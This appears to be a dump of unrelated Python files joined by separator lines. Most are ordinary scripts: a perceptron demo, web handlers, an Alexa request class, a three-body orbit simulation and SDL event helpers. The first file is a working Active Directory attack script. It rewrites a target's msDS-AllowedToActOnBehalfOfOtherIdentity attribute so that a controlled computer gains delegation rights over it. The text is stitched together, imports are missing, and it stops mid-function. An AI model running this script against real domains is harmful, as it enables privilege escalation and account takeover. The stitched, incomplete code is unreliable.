import argparse
# CLI definition: exactly one credential (password, LM:NT hash, or Kerberos)
# is required; target/controlled objects are passed as distinguished names.
parser = argparse.ArgumentParser(description='Set SD for controlled computer object to a target object for RBCD')
parser.add_argument('-u','--username', help='username for LDAP', required=False)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-p','--password', help='password for LDAP')
group.add_argument('-H','--hash', help='LM:NT hash for LDAP')
group.add_argument('-k', '--kerberos', help='Kerberos Auth GSSAPI',action='store_true')
parser.add_argument('-d','--domain', help='LDAP server/domain', required=True)
parser.add_argument('-t','--targetDn', help='Target distinguishedName (Example: "CN=DC1,OU=Domain Controllers,DC=lab,DC=local")', required=True)
parser.add_argument('-c','--contrDn', help='Controlled computer distingushedName to add to msDS-AllowedToActOnBehalfOfOtherIdentity attribute', required=True)
parser.add_argument('-l','--ldapserver', help='LDAP server, in case it cant resolve', required=False)
parser.add_argument('--cleanup', help='Delete msDS-AllowedToActOnBehalfOfOtherIdentity value',action='store_true', required=False)
def main():
    """Set (or clean up) msDS-AllowedToActOnBehalfOfOtherIdentity on the target
    object, granting the controlled computer resource-based constrained
    delegation (RBCD) rights."""
    args = parser.parse_args()
    # Prefer the explicit LDAP server; otherwise resolve via the domain name.
    if (args.ldapserver):
        server = args.ldapserver
    else:
        server = args.domain
    username = "{}\\{}".format(args.domain, args.username)
    s = Server(server, get_info=ALL)
    # Bind with NTLM (password or hash) or Kerberos GSSAPI as supplied.
    if (args.password):
        conn = Connection(s, user=username, password=args.password, authentication=NTLM, auto_bind=True)
    elif (args.hash):
        conn = Connection(s, user=username, password=args.hash, authentication=NTLM, auto_bind=True)
    elif (args.kerberos):
        # Kerberos needs the DC's name for the SASL SPN.
        if not (args.ldapserver):
            print("Error: Specify DC for ldapserver argument")
            exit()
        else:
            conn = Connection(s, sasl_credentials=(args.ldapserver,), authentication=SASL, sasl_mechanism=KERBEROS, auto_bind=True)
    # Resolve the controlled computer's binary objectSID from its DN.
    conn.search(args.contrDn,"(objectClass=Computer)",attributes=['objectSID'])
    contrSid = conn.entries[0]['objectSID'].raw_values[0]
    #SD full value with removed SID
    # Template security descriptor; the first ACE's SID is patched in below.
    sd_bytes = unhexlify(b'010004804000000000000000000000001400000004002c000100000000002400ff010f000000000000000000000000000000000000000000000000000000000001020000000000052000000020020000')
    sd = SR_SECURITY_DESCRIPTOR(data=sd_bytes)
    sd['Dacl'].aces[0].fields['Ace'].fields['Sid'].setData(contrSid)
    if (args.cleanup == True):
        # Remove the attribute value entirely (undo the delegation grant).
        if(conn.modify(args.targetDn,{'msDS-AllowedToActOnBehalfOfOtherIdentity':[MODIFY_DELETE, []]})):
            print("Successfully cleaned up!")
        else:
            print("An error was encountered, D:")
    else:
        if (conn.modify(args.targetDn,{'msDS-AllowedToActOnBehalfOfOtherIdentity':[MODIFY_REPLACE, sd.getData()]})):
            print("Successfully added permissions!")
        else:
            print("An error was encountered, D:")


if __name__ == "__main__":
    main()
|
import numpy as np
import matplotlib as mpl
mpl.use('TkAgg')
import matplotlib.pyplot as plt
from time import sleep
# Python 2 perceptron demo setup: N random 2-D points labelled by whether
# x + y > 1 (the separating line), plotted and augmented with a bias column.
N = 50
x1 = np.random.random((N,2))
x1 = x1
c = x1[:,0]+x1[:,1]>1
# Append the boolean class label as a third column.
x1 = np.hstack([x1,np.reshape(c,(N,1))])
type1 = np.array(list(filter(lambda x: x[2] == 0, x1)))
type2 = np.array(list(filter(lambda x: x[2] > 0, x1)))
# print type1,"\n\n",type2
plt.scatter(type1[:,0],type1[:,1],marker="o",c="r",label="class-0")
plt.scatter(type2[:,0],type2[:,1],marker="x",c="b",label="class-1")
plt.xlabel("x")
plt.ylabel("y")
plt.legend()
plt.title("Check it out")
plt.axis([0,1,0,1])
# print "FEATURE MATRIX",x1[:,0:2]
# w holds the weight-vector history; row t is the weights at iteration t.
w = np.array([[0, 0, 0]])
Y = np.array([])
i=0
# x11: features with a leading column of ones (bias term); y11: labels.
x11 = np.hstack((np.ones((N,1)),x1[:,0:2]))
y11=x1[:,2]
print x11,y11
t=0
alpha = 0.1
def graph(w0 = [-.5, 1, 0],bold=False):
    # Plot the decision line w0[0] + w0[1]*x + w0[2]*y = 0 on the current
    # figure; `bold` draws it thicker (used for the final solution).
    # NOTE(review): the mutable default list is never mutated here, so it is
    # harmless, but a tuple default would be safer.
    dontplot = 0
    if w0[1]!=0 and w0[2]!=0:
        # General case: solve for x as a function of y.
        y = np.arange(0, 1, 0.1)
        x=(-w0[0] - w0[2] * y)/w0[1]
    else:
        if w0[1]==0 and w0[2]!=0:
            # Horizontal line.
            x=np.arange(0, 1, 0.1)
            y=(-w0[0])/w0[2]
        elif w0[1]!=0 and w0[2]==0:
            # Vertical line.
            y = np.arange(0, 1, 0.1)
            x = (-w0[0])/w0[1]
        else:
            # Degenerate weights (both slopes zero): nothing to draw.
            dontplot =1
    if dontplot!=1:
        if bold==True:
            plt.plot(x,y,linewidth=7.0)
        else:
            plt.plot(x,y)
    # Brief pause so the animation renders incrementally.
    plt.pause(0.02)
def net_input(x, w):
    """Weighted sum: the bias w[0] plus the dot product of x with w[1:]."""
    return w[0] + np.dot(x, w[1:])
def predict(x, w):
    """Threshold classifier: +1 where bias + x.w[1:] is non-negative, else -1."""
    activation = np.dot(x, w[1:]) + w[0]
    return np.where(activation >= 0.0, 1, -1)
# Batch perceptron training: collect the misclassified set Y each pass and
# update the weights with the summed (scaled) error until Y is empty or the
# iteration cap is reached.  (Python 2 print statements.)
while(len(Y)!=0 or i==0):
    Y = []
    i=1
    s=np.array([0,0,0],dtype='float64')
    for key,val in enumerate(x11):
        # Map the 0/1 class label to -1/+1.
        if y11[key] == 0:
            delta = -1
        else:
            delta = 1
        # delta * w.x >= 0 means this sample is on the wrong side: collect it.
        if delta*w[t].transpose().dot(val) >= 0 :
            Y.append(np.hstack((val, delta)))
    print "Y---",len(Y)," ",Y
    graph(w[t])
    if len(Y)==0:
        # Converged: redraw the final separating line in bold.
        graph(w[-1],True)
        print 'solution',w[-1]
        break
    # Sum the signed misclassified samples and scale by the learning rate.
    for item in Y:
        s+=item[3]*item[0:3]
    s=alpha*s
    print "s:",s," alpha:",alpha
    t=t+1
    # Append the updated weight vector as a new row of the history matrix w.
    z = w[t - 1] - s
    zx = []
    zx.append(z)
    w = np.concatenate((w,np.array(zx)))
    print "W",t," ",w
    if t==100:
        break
plt.show()
''' Imports '''
# optical model components
from .optics import std_opt_params, gen_optics, gen_optics_rev
# image translation
from .image import import_image, gen_image
from .image import gen_img_rays, gen_rev_rays, get_paths, translate_image
# batch image generation protocols
from .batch import init_optics, batch_translate, store_images
# helper display functions
from .display import plot_3d_ellipsoid, plot_3d_line
''' development only - direct access to module functions '''
'''
# functions
from .engine import *
'''
'''
# module
from . import engine
'''
|
from tornado.escape import json_encode,json_decode
from tornado.gen import coroutine
from mod.base.base import BaseHandler
from mod.base.exceptions import ArgsError, PermissionDeniedError,OtherError
class GetAddressHandler(BaseHandler):
    """Return the saved delivery addresses for the user identified by a token.

    Responds with {'address': 'token_error'} when the token matches no
    customer, otherwise {'address': [rows...]} ordered default-first.
    """

    @coroutine
    def post(self):
        token = self.get_json_argument("token")
        # Ensure the user exists.  Query parameters are passed as explicit
        # 1-tuples: the previous code used `(token)`, which is just a
        # parenthesized string, not a tuple — fragile across DB drivers.
        curuser = yield self.db.execute(
            "SELECT * FROM customer WHERE token=%s",
            (token,)
        )
        if curuser.rowcount == 0:
            state = {'address': 'token_error'}
            self.fin_succ(**state)
        else:
            user = curuser.fetchone()
            tel_phone = user["tel_phone"]
            # Addresses ordered with the default one (is_def) first.
            cur = yield self.db.execute(
                "SELECT * FROM User_used_address WHERE tel_phone=%s order by is_def desc",
                (tel_phone,)
            )
            addresses = cur.fetchall()
            state = {"address": addresses}
            self.fin_succ(**state)
|
import names
import uuid
import numpy as np
from activity_model import ActivityModel
AMOUNT = 100  # fixed lot size for every buy/sell


class Worker:
    """A simulated trader that buys/sells fixed-size lots based on model output.

    funds     -- available cash (starts at 100000)
    portfolio -- open positions as dicts: {id, tag, amount, at_value}
    """

    def __init__(self, pool, weights=None, surname=None):
        # With a surname, pair it with a random first name; otherwise a full random name.
        self.name = names.get_first_name() + " " + surname if surname != None else names.get_full_name()
        self.pool = pool
        self.model = ActivityModel(weights)
        self.funds = 100000
        self.portfolio = []
        #print("[Pool %s][%s] Worker initialised" % (self.pool, self.name))

    def action(self, prediction_values_X, actual_values_X, tag):
        """Predict on prediction_values_X and act on `tag` at the latest price.

        Returns (action, success): action 0 = hold, 1 = buy, 2 = sell;
        success is False when a buy is unaffordable or a sell finds no position.
        """
        predict = self.model.predict(prediction_values_X)
        action = np.argmax(predict)  # class with the highest confidence
        success = False
        if action == 0:
            # Hold: nothing to do.
            success = True
        elif action == 1:
            price = actual_values_X[0][-1]
            cost = AMOUNT * price
            if self.funds >= cost:
                # BUG FIX: the purchase previously never deducted its cost,
                # so funds could only ever increase.
                self.funds -= cost
                self.portfolio.append({
                    "id": uuid.uuid4(),
                    "tag": tag,
                    "amount": AMOUNT,
                    "at_value": price
                })
                success = True
            #else: worker cannot afford to buy this lot
        elif action == 2:
            # Sell the first open position matching this tag, if any.
            removed = False
            for stock in self.portfolio:
                if stock["tag"] == tag:
                    self.portfolio.remove(stock)
                    removed = stock
                    break
            if removed:
                funcs_inc = removed["amount"] * actual_values_X[0][-1]
                self.funds += funcs_inc
                bought_for = removed["amount"] * removed["at_value"]
                difference = funcs_inc - bought_for
                profit_or_loss = "profit" if difference > 0 else "loss"
                #print("[Worker %s] Sold %s for %f, a %s of %f" % (self.name, tag, funcs_inc, profit_or_loss, difference))
                success = True
            #else: no position with this tag to sell
        return action, success

    def get_funds(self):
        """Current cash balance."""
        return self.funds
def print_n_times(num):
    """Print the integers 0 .. num-1, one per line."""
    for value in range(num):
        print(value)
def print_n_times_rec(num):
    """Recursively print num, num-1, ..., 0; no output for a negative num."""
    if num < 0:
        return None
    print(num)
    return print_n_times_rec(num - 1)
def print_n_times_asc_rec(num, count=0):
    """Recursively print count, count+1, ..., num-1 in ascending order.

    The original incremented ``num`` and then recursed with ``num - 1`` —
    a no-op pair that obscured the logic; the net recursion is simply
    (num, count + 1), which this version uses directly.
    """
    if num > count:
        print(count)
        return print_n_times_asc_rec(num, count + 1)
    return None
# Demo run: print the integers 0..99 iteratively.
print_n_times(100)
|
from .errors import *
class AlexaRequest:
    """Represents a request sent by Alexa

    --- Attributes ---
    version - str
        the version of the request
    session_is_new - bool
        True if session was just created
    session_id - str
        id of the current session
    app_id - str
        id of the skill
    attributes - dict
        session attributes that persist in session
    user_id - str
        id of the user
    access_token - str
        user's access token
    consent_token - str
        user's consent token
    device_id - str
        id of the device being used
    supported_interfaces - dict
        interfaces supported by the current device
    api_endpoint - str
        endpoint of the Alexa API
    api_access_token - str
        access token for the Alexa API
    audio_player - dict
        AudioPlayer object containing audio player properties

    --- Methods ---
    slot_value(name)
        returns the slot value of the slot name passed in
    """

    def __init__(self, event):
        # The raw request envelope (parsed JSON dict) handed to the skill.
        self.event = event

    # --- Getters
    @property
    def version(self):
        return self.event["version"]

    @property
    def session_is_new(self):
        return self.event["session"]["new"]

    @property
    def session_id(self):
        # BUG FIX: the key is camelCase 'sessionId', not 'sessionid'.
        return self.event["session"]["sessionId"]

    @property
    def app_id(self):
        # BUG FIX: 'sessoin' typo, and applicationId lives under
        # session.application in the Alexa request envelope.
        return self.event["session"]["application"]["applicationId"]

    @property
    def attributes(self):
        try:
            return self.event["session"]["attributes"]
        except KeyError:
            return None

    # allows usage of either "attributes" or "session_attributes"
    @property
    def session_attributes(self):
        return self.attributes

    @property
    def user_id(self):
        return self.event["session"]["user"]["userId"]

    @property
    def access_token(self):
        return self.event["session"]["user"]["accessToken"]

    @property
    def consent_token(self):
        return self.event["session"]["user"]["permissions"]["consentToken"]

    @property
    def device_id(self):
        return self.event["context"]["System"]["device"]["deviceId"]

    @property
    def supported_interfaces(self):
        # BUG FIX: this was a copy-paste of device_id and returned the
        # deviceId; it now returns the supportedInterfaces map.
        return self.event["context"]["System"]["device"]["supportedInterfaces"]

    @property
    def api_endpoint(self):
        return self.event["context"]["System"]["apiEndpoint"]

    @property
    def api_access_token(self):
        return self.event["context"]["System"]["apiAccessToken"]

    @property
    def audio_player(self):  # replace with an AudioPlayer object
        # BUG FIX: AudioPlayer sits directly under context, not context.System.
        return self.event["context"]["AudioPlayer"]

    # --- Methods
    def has_value(self, slotName):
        """Return True if the named slot carries a value.

        --- Parameters ---
        slotName - str
            the name of the slot to check for a value
        """
        return "value" in self.event["request"]["intent"]["slots"][slotName]

    def slot_value(self, slotName):
        """Return the value of the named slot.

        --- Parameters ---
        slotName - str
            the name of the slot to get the value of

        Raises NoSlotValueError when the slot has no value.
        """
        if self.has_value(slotName):
            return self.event["request"]["intent"]["slots"][slotName]["value"]
        raise NoSlotValueError("There was no slot value for slot '%s'" % slotName)
|
# -*- coding: utf-8 -*-
"""
Template para tratar erros de leitura de titulos de paginas web
durante a realizacao de um web scraping
"""
# Importacao das bibliotecas
from bs4 import BeautifulSoup
from urllib.request import urlopen
from urllib.error import HTTPError, URLError
# Funcao para tratar erros de retorno na leitura dos titulos das paginas web
# Funcao para tratar erros de retorno na leitura dos titulos das paginas web
def getTitulo(url):
    """Fetch *url* and return its <body><h1> tag, or None on any error."""
    try:
        html = urlopen(url)
    except HTTPError as erro:
        # BUG FIX: the 'f' prefix was missing, so the messages printed the
        # literal text '{erro}' instead of the exception details.
        print(f"Ocorreu erro HTTP: {erro}")
        return None
    except URLError as erro:
        print(f"Ocorreu erro URL: {erro}")
        return None
    except Exception:
        # Narrowed from a bare except so Ctrl-C / SystemExit still propagate.
        print("Ocorreu erro na pagina!")
        return None
    try:
        sopa = BeautifulSoup(html.read(), "html.parser")
        titulo = sopa.body.h1
    except AttributeError as erro:
        print(f"Ocorreu erro ao acessar a tag: {erro}")
        return None
    except Exception:
        print("Ocorreu erro ao acessar o conteudo da pagina!")
        return None
    return titulo
# Prompt for a URL and report its <h1> title, if one was found.
titulo = getTitulo(input("Informe a URL completa: "))
if titulo is not None:
    print(titulo)
else:
    print("Titulo nao encontrado!")
|
import logging
import os
import re
import time
from threading import Event
import psutil
from common.timer import Timer
logger = logging.getLogger('log01')
class BatchCheckBase:
    """Extract user ids from URLs with a regex exposing an 'id' group.

    usr_dict maps lower-cased ids to their URL; usr_list keeps the ids in
    input order with original casing.
    """

    def __init__(self, pattern_id, urls):
        self.usr_dict = {}
        self.usr_list = []
        self.pattern_id = pattern_id
        for link in urls:
            self.get_id(link)

    def get_id(self, url):
        """Record the id embedded in *url*; URLs that do not match are ignored."""
        matched = re.match(self.pattern_id, url)
        if matched is None:
            return
        usr_id = matched.group('id')
        self.usr_dict[usr_id.lower()] = url
        self.usr_list.append(usr_id)

    def check(self):
        """Hook for subclasses; the base implementation does nothing."""
        pass
class Monitoring(Timer):
    # Watches a download's '.part' file from a timer thread and terminates
    # the child download processes when the file stops growing (stall) or
    # exceeds 2.5 GiB (to force segmented downloads).

    def __init__(self, parent_pid, file_name):
        # Poll every 20 s; kill_child_processes is the timer callback.
        super().__init__(func=self.kill_child_processes, interval=20)
        self.parent = self.children = self.numc = None
        self.parent_pid = parent_pid
        # Downloads are written to '<name>.part' until complete.
        self.file_name = file_name + '.part'
        # Size (GiB) observed at the previous tick, for stall detection.
        self.last_file_size = 0.0
        # Set once the 2.5 GiB split threshold has been reached.
        self.flag = Event()

    def terminate(self):
        # Terminate all child processes of the monitored parent, if any.
        if self.numc == 0:
            logger.error("ChildrenProcess doesn't exist")
        else:
            for process in self.children:
                process.terminate()
        # logger.info('下载卡死' + self.file_name)

    def get_process(self, parent_pid):
        # Return (parent, children, child_count); stops the timer when the
        # parent has already exited.
        try:
            parent = psutil.Process(parent_pid)
        except psutil.NoSuchProcess:
            self.stop()
            return logger.error("Process doesn't exist")
        children = parent.children(recursive=True)
        numc = len(children)
        return parent, children, numc

    def kill_child_processes(self):
        # Timer callback: stop after a split was requested, otherwise compare
        # the file size against the previous tick to detect a stalled download.
        if self.flag.is_set():
            self.stop()
            return
        file_size = os.path.getsize(self.file_name) / 1024 / 1024 / 1024  # bytes -> GiB
        if file_size <= self.last_file_size:
            # No growth since the last tick: treat as stalled and kill.
            logger.error('下载卡死' + self.file_name)
            if self.numc == 0:
                self.parent.terminate()
            else:
                self.terminate()
            time.sleep(1)
            if os.path.isfile(self.file_name):
                return logger.info('卡死下载进程可能未成功退出')
            else:
                self.stop()
                return logger.info('卡死下载进程成功退出')
        self.last_file_size = file_size
        if file_size >= 2.5:
            # Large file: request a segmented download and stop the children.
            self.flag.set()
            self.terminate()
            logger.info('分段下载' + self.file_name)

    def __timer(self):
        # Poll loop driven by the base Timer's interval; gives up after a few
        # ticks if the .part file never appears.
        # NOTE(review): self._flag / self._func / self._args / self._kwargs
        # come from common.timer.Timer — confirm their semantics there.
        logger.debug('获取到{0},{1}'.format(self.parent_pid, self.file_name))
        retry = 0
        while not self._flag.wait(self.interval):
            self.parent, self.children, self.numc = self.get_process(self.parent_pid)
            if os.path.isfile(self.file_name):
                self._func(*self._args, **self._kwargs)
            else:
                logger.info('%s不存在' % self.file_name)
                if retry >= 2:
                    self.terminate()
                    return logger.info('结束进程,找不到%s' % self.file_name)
                retry += 1
        # logger.info('监控<%s>线程退出' % self.file_name)

    def run(self):
        # Thread entry point; always log the exit for traceability.
        try:
            self.__timer()
        finally:
            logger.debug('退出监控<%s>线程' % self.file_name)
def match1(text, *patterns):
    """Search *text* with one or more regex patterns.

    With a single pattern, return group(1) of the match, or None if it
    did not match. With several patterns, return the list of group(1)
    values for the patterns that matched (non-matching ones are skipped).
    """
    if len(patterns) == 1:
        found = re.search(patterns[0], text)
        return found.group(1) if found else None
    hits = (re.search(p, text) for p in patterns)
    return [h.group(1) for h in hits if h]
|
# Ask for a year and report how many days it has (Gregorian calendar).
year = int(input("Input year: "))
if year > 0:
    # Leap if divisible by 4, except centuries unless divisible by 400.
    is_leap = year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
    day = 366 if is_leap else 365
    print("Days number = ", day)
else:
    print("Sorry but you input negative year")
|
class GoogleCampaignMiddleware:
    """Capture Google Analytics utm_* query parameters into the session.

    When a request carries ``utm_source``, all present utm codes replace
    the stored dict. The current values are always mirrored onto
    ``request.utm`` so templates can read them.
    """

    UTM_CODES = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content']

    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        if not request.session.get('utm'):
            request.session['utm'] = {}
        if request.GET.get('utm_source'):
            # New campaign landing: rebuild the stored utm dict from scratch.
            captured = {code: request.GET.get(code)
                        for code in self.UTM_CODES
                        if request.GET.get(code)}
            request.session['utm'] = captured
        # Expose utm codes on the request object for template access.
        request.utm = request.session['utm']
        return self.get_response(request)
|
# -*- coding: utf-8 -*-
"""
Count how many values of dict1 are lists and print that count.
"""
dict1 = {1: [1], 2: 1, 3: [3, 4]}
new_list = [value for value in dict1.values() if isinstance(value, list)]
print(len(new_list))
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
# Simple linear regression on the headbrain dataset.
# Assumes column 2 is head size and column 3 is brain weight — TODO confirm
# against headbrain.csv.
data=pd.read_csv('headbrain.csv')
x=data.iloc[:,2].values
y=data.iloc[:,3].values
# Closed-form least squares: slope = sum((x-mx)(y-my)) / sum((x-mx)^2).
xMean=np.mean(x)
yMean=np.mean(y)
upper=0
lower=0
for i in range(0,len(x)):
    upper=upper+((x[i]-xMean)*(y[i]-yMean))
    lower=lower+((x[i]-xMean)**2)
bDash=upper/lower  # slope
print(bDash)
bNot=yMean-(bDash*xMean)  # intercept
print(bNot)
# Cross-check the manual fit against sklearn's LinearRegression.
x1=data.iloc[:,2:3].values
#from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
regressor=LinearRegression()
regressor.fit(x1,y) #this is used to train the machine
m=regressor.coef_
c=regressor.intercept_
print(m)
print(c)
#print(regressor.score(x1,y))
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-30 04:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a 3-character ``age`` CharField to PatientProfile.

    ``preserve_default=False`` means the '20' default only backfills
    existing rows during this migration and is not kept on the model.
    """

    dependencies = [
        ('patients', '0002_auto_20171029_2353'),
    ]

    operations = [
        migrations.AddField(
            model_name='patientprofile',
            name='age',
            field=models.CharField(default='20', max_length=3),
            preserve_default=False,
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 26 17:54:31 2020
@author: Alex Lee
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import solve_ivp
from scipy.integrate import odeint
from scipy.signal import argrelextrema
# Physical constants (SI units).
G = 6.67430e-11
Msun = 1988500e24 #kg
mearth = 5.97219e24 #kg
mjup = 1898.13e24
au = 149597870700 #m
aupday = 149597870700/24/60/60 #m/s
# State vectors (epoch 2020 Sept 14), converted from au and au/day to SI.
xs = -5.871476350881860E-03*au
ys = 6.579099261042989E-03*au
zs = 8.190722904306934E-05*au ## z
# BUG FIX: the z component previously reused ys (np.array([xs, ys, ys]));
# zs was defined but unused. Use zs for the Sun's z coordinate.
rsun0 = np.array([xs, ys, zs])
vxs = -7.499359804658616E-06*aupday ## x
vys = -4.805753079522615E-06*aupday ## y
vzs = 2.213656602068544E-07*aupday ## z
vsun0 = np.array([vxs, vys, vzs])
xe = 9.886566130496588E-01*au
ye = -1.445653650721954E-01*au
ze = 8.438508460440852E-05*au
re0 = np.array([xe, ye, ze])
vxe = 2.302725583407780E-03*aupday
vye = 1.694428848894045E-02*aupday
vze = -1.042608823204765E-06*aupday
ve0 = np.array([vxe, vye, vze])
xj = 2.347699840428325E+00*au
yj = -4.555746878516208E+00*au
zj = -3.362641503393212E-02*au
rj0 = np.array([xj, yj, zj])
vxj = 6.615387200421259E-03*aupday
vyj = 3.815156141796302E-03*aupday
vzj = -1.637910576358818E-04*aupday
vj0 = np.array([vxj, vyj, vzj])
#Update CM
# Mass-weighted barycenter position and velocity of the three-body system.
r_cm0 = (Msun*rsun0 + mjup*rj0 + mearth*re0)/(Msun+mearth+mjup)
v_cm0 = (Msun*vsun0 + mjup*vj0 + mearth*ve0)/(Msun+mearth+mjup)
def ThreeBodyEquations(w,t):
    """Right-hand side for odeint: Sun/Earth/Jupiter gravitational ODEs.

    w packs [r_sun, r_earth, r_jup, v_sun, v_earth, v_jup] as 18 SI-unit
    components; t is unused (the system is autonomous). Returns the
    18-component derivative vector in the same layout.
    Reads the module-level constants G, Msun, mearth, mjup.
    """
    r1=w[:3]
    r2=w[3:6]
    r3=w[6:9]
    v1=w[9:12]
    v2=w[12:15]
    v3=w[15:18]
    # Pairwise separations (scalars).
    r12=np.linalg.norm(r2-r1)
    r13=np.linalg.norm(r3-r1)
    r23=np.linalg.norm(r3-r2)
    # Newtonian accelerations: each body feels the other two.
    dv1bydt= G*mearth*(r2-r1)/r12**3 + G*mjup*(r3-r1)/r13**3
    dv2bydt= G*Msun*(r1-r2)/r12**3 + G*mjup*(r3-r2)/r23**3
    dv3bydt= G*Msun*(r1-r3)/r13**3 + G*mearth*(r2-r3)/r23**3
    dr1bydt= v1
    dr2bydt= v2
    dr3bydt= v3
    # Re-assemble in the same [positions..., velocities...] layout as w.
    r12_derivs = np.concatenate((dr1bydt,dr2bydt))
    r_derivs = np.concatenate((r12_derivs,dr3bydt))
    v12_derivs = np.concatenate((dv1bydt,dv2bydt))
    v_derivs = np.concatenate((v12_derivs,dv3bydt))
    derivs = np.concatenate((r_derivs,v_derivs))
    return derivs
# Integrate the three-body system over `tyear` years and analyze
# Earth's orbit (aphelion/perihelion timing and eccentricity).
init_params=np.array([rsun0,re0,rj0,vsun0,ve0,vj0]) #Initial parameters
init_params=init_params.flatten()
sec = 1
minu = 60*sec
hour = 60*minu
day = 24*hour
year = 365.242199*day
tyear = 100 ## which is reaching my computer's limit.
T = tyear*year
nsteps0= 2*hour  # output sampling step: one sample every 2 hours
t = np.linspace(0, T, int(T/nsteps0))
three_body_sol=odeint(ThreeBodyEquations, init_params,t )
# Unpack columns: [r_sun, r_earth, r_jup, v_sun, v_earth, v_jup].
rsun = three_body_sol[:,:3]
rearth = three_body_sol[:,3:6]
rjup = three_body_sol[:,6:9]
vsun = three_body_sol[:, 9:12]
vearth = three_body_sol[:,12:15]
vjup = three_body_sol[:,15:18]
# Barycenter trajectory, mass-weighted exactly like r_cm0/v_cm0 above.
r_cm=(Msun*rsun + mjup*rjup + mearth*rearth)/(Msun+mearth+mjup)
# BUG FIX: v_cm previously mixed velocity*velocity terms (vjup*vj0,
# vearth*ve0) instead of weighting each body's velocity by its mass.
v_cm=(Msun*vsun + mjup*vjup + mearth*vearth)/(Msun+mearth+mjup)
# Positions/velocities relative to the barycenter.
re_cm = rearth-r_cm
rs_cm = rsun-r_cm
rj_cm = rjup-r_cm
ve_cm = vearth - v_cm
vs_cm = vsun - v_cm
vj_cm = vjup - v_cm
re_mag = np.linalg.norm(re_cm, axis=1)
days = t/day
plt.plot(days, re_mag)
plt.xlim(0, 365*10)
# Local maxima/minima of the Sun-Earth distance.
aphelion = argrelextrema(re_mag, np.greater)
plt.scatter(days[aphelion], re_mag[aphelion], label = 'Aphelion')
perihelion = argrelextrema(-re_mag, np.greater)
plt.scatter(days[perihelion], re_mag[perihelion], label = 'Perihelion')
plt.xlabel('Day after 2020 Sept 14 ')
plt.ylabel('Distance to the sun [m] ')
plt.title('Distance change in 10 years example')
plt.legend()
plt.figure()
plt.plot(days[aphelion], re_mag[aphelion], label = 'Aphelion')
plt.plot(days[perihelion], re_mag[perihelion], label = 'Perihelion')
plt.xlabel('Days after 2020 Sept 14 ')
plt.ylabel('Distance to the sun [m] ')
plt.legend()
# Trim to matching counts so the eccentricity formula can pair them up.
perihelion = np.array(perihelion)[0]
aphelion = np.array(aphelion)[0]
perihelion = perihelion[0: len(aphelion)]
eccen = (re_mag[aphelion] - re_mag[perihelion])/ (re_mag[aphelion] + re_mag[perihelion])
eyear = np.linspace(1, len(eccen), len(eccen))
plt.figure()
plt.title('Days between aphelions and aphelion')
years = np.linspace(1, len(aphelion)-1, len(aphelion)-1)
plt.scatter(years,days[aphelion[1: len(aphelion)]]- days[aphelion[0: len(aphelion)-1]], label = 'Aphelion' , marker= '*')
plt.scatter(years,days[perihelion[1: len(perihelion)]]- days[perihelion[0: len(perihelion)-1]] , label = 'Perihelion', marker = '.')
plt.xlabel('Year after 2020')
plt.ylabel('Days of a year base on the aphelions difference')
plt.legend()
plt.figure()
plt.plot(eyear, eccen)
title = 'Eccentricity change in '+ str(tyear) + ' years'
plt.title(title)
plt.xlabel('Year after 2020')
plt.ylabel('Eccentricity ')
plt.figure()
plt.plot(re_cm[:, 0],re_cm[:, 1])
plt.plot(rs_cm[:, 0],rs_cm[:, 1], marker='o')
plt.plot(rj_cm[:, 0],rj_cm[:, 1])
|
"""Functions for simulating various SDL2 input events."""
import sdl2
from ctypes import byref
# Helper functions
def _mousebutton_flag(button):
    """Map a button name ('left'/'right'/'middle') to its SDL button flag.

    Raises ValueError for any other name.
    """
    buttons = {
        'left': sdl2.SDL_BUTTON_LEFT,
        'right': sdl2.SDL_BUTTON_RIGHT,
        'middle': sdl2.SDL_BUTTON_MIDDLE
    }
    if button not in buttons:
        # BUG FIX: the message previously formatted an undefined name `key`,
        # so invalid input raised NameError instead of the intended ValueError.
        raise ValueError("'{0}' is not a valid mouse button.".format(str(button)))
    return buttons[button]
def _keysym_attrs(key, mod=None):
    """Resolve *key* (SDL key name string or keycode int) and optional *mod*
    ('ctrl'/'shift'/'alt'/'meta', a raw KMOD int, or None) into the tuple
    (keycode, modval). Raises ValueError for unknown names or mod types.
    """
    if type(key) is str:
        keycode = sdl2.SDL_GetKeyFromName(key.encode('utf8'))
        if keycode == 0:
            raise ValueError("'{0}' is not a recognized key name.".format(key))
    else:
        keycode = key
    mod_flags = {
        'ctrl': sdl2.KMOD_CTRL, 'shift': sdl2.KMOD_SHIFT,
        'alt': sdl2.KMOD_ALT, 'meta': sdl2.KMOD_GUI
    }
    modval = 0
    if mod:
        if type(mod) is str and mod in mod_flags.keys():
            modval = mod_flags[mod]
        elif type(mod) is int:
            modval = mod
        else:
            raise ValueError("'mod' must be a string or int.")
    return (keycode, modval)
# SDL_Event simulation functions
def keydown(key, mod = None):
    """Build a simulated SDL_KEYDOWN event for the given key and modifier."""
    keycode, modval = _keysym_attrs(key, mod)
    event = sdl2.SDL_Event()
    event.type = sdl2.SDL_KEYDOWN
    event.key.type = sdl2.SDL_KEYDOWN
    event.key.keysym.sym = keycode
    event.key.keysym.mod = modval
    return event
def keyup(key, mod = None):
    """Build a simulated SDL_KEYUP event for the given key and modifier."""
    keycode, modval = _keysym_attrs(key, mod)
    event = sdl2.SDL_Event()
    event.type = sdl2.SDL_KEYUP
    event.key.type = sdl2.SDL_KEYUP
    event.key.keysym.sym = keycode
    event.key.keysym.mod = modval
    return event
def click(button = 'right', loc = (0, 0), release = False):
    """Build a simulated mouse-button event at *loc*.

    *release* selects SDL_MOUSEBUTTONUP instead of SDL_MOUSEBUTTONDOWN.
    """
    kind = sdl2.SDL_MOUSEBUTTONUP if release else sdl2.SDL_MOUSEBUTTONDOWN
    event = sdl2.SDL_Event()
    event.type = kind
    event.button.type = kind
    event.button.x, event.button.y = loc
    event.button.button = _mousebutton_flag(button)
    return event
def textinput(char):
    """Build a simulated SDL_TEXTINPUT event carrying *char* (UTF-8 encoded)."""
    event = sdl2.SDL_Event()
    event.type = sdl2.SDL_TEXTINPUT
